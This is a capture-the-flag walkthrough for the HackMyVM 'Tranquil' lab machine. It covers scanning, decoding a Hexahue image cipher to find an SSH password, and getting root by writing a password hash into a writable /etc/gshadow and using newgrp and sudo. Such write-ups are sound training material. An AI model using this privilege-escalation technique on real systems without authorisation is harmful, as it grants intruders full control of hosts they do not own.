HackMyVm Tranquil Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Tranquil

Key points: multi service on one port, gshadow.

Scan ports, only 21 is open, and anonymous login, very strange.

nmap -sV -sC -p- -oN ports.log 192.168.56.100
 Nmap scan report for deathnote.vuln (192.168.56.100)
 Host is up (0.00076s latency).
 Not shown: 65534 closed ports
 PORT   STATE SERVICE VERSION
 21/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
 |_ftp-bounce: ERROR: Script execution failed (use -d to debug)
 | ssh-hostkey:
 |   3072 0e:03:3b:78:00:29:1d:ba:60:86:0e:d3:bb:7e:3c:04 (RSA)
 |   256 2a:47:4d:9c:ce:07:61:ca:f0:ca:58:8b:5b:0f:d4:db (ECDSA)
 |_  256 6c:42:50:a5:60:e9:0f:37:0f:be:ec:d1:20:74:29:9c (ED25519)
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Check port 21 with curl.

 ~ curl http://192.168.56.100:21/                                                                                                         fish-0 | 0 [14:06:46]
 <img src="tranquil.jpg">

 <!-- We are one, humans, computers and ports.
 - guru -->

Gobuster enum files and folders, but found nothing.

Download tranquil.jpg, found strange coding on left side.
[image-20211012140828145.png]

Google "color squares coding", decode it at site: https://www.dcode.fr/hexahue-cipher. Then we get a string.

[image-20211012141217483.png]

When use nc to check port 21, we can see OpenSSH is running on this port.

 ~ nc 192.168.56.100 21                                                                                                                   fish-0 | 0 [14:14:14]
 SSH-2.0-OpenSSH_8.4p1 Debian-5
 123
 Invalid SSH identification string.

Login with username guru and password we get.

 ~ ssh guru@192.168.56.100 -p 21                                                                                                        fish-0 | 130 [14:12:56]
 The authenticity of host '[192.168.56.100]:21 ([192.168.56.100]:21)' can't be established.               ...
 guru@tranquil:~$

Found files writable.

 guru@tranquil:~$ find / -writable -not -path "/proc*" 2>/dev/null
 ...
 /etc/gshadow
 ...

Generate a password hash

 guru@tranquil:~$ openssl passwd mypass
 //bd4FHJjr7kg

Add the password hash to sudo group in gshadow.

 guru@tranquil:~$ cat /etc/gshadow  
 root:*::                                                                                                 ...
 sudo://bd4FHJjr7kg::
 ...

Use newgrp to change group of user guru, enter the passwd. Check sudo again.

 guru@tranquil:~$ newgrp sudo
 Password:      
 guru@tranquil:~$ sudo -l
 [sudo] password for guru:
 Matching Defaults entries for guru on tranquil:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 User guru may run the following commands on tranquil:
     (ALL : ALL) ALL                    

Then we can be root.

 guru@tranquil:~$ sudo su
 root@tranquil:/home/guru# id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 tranquil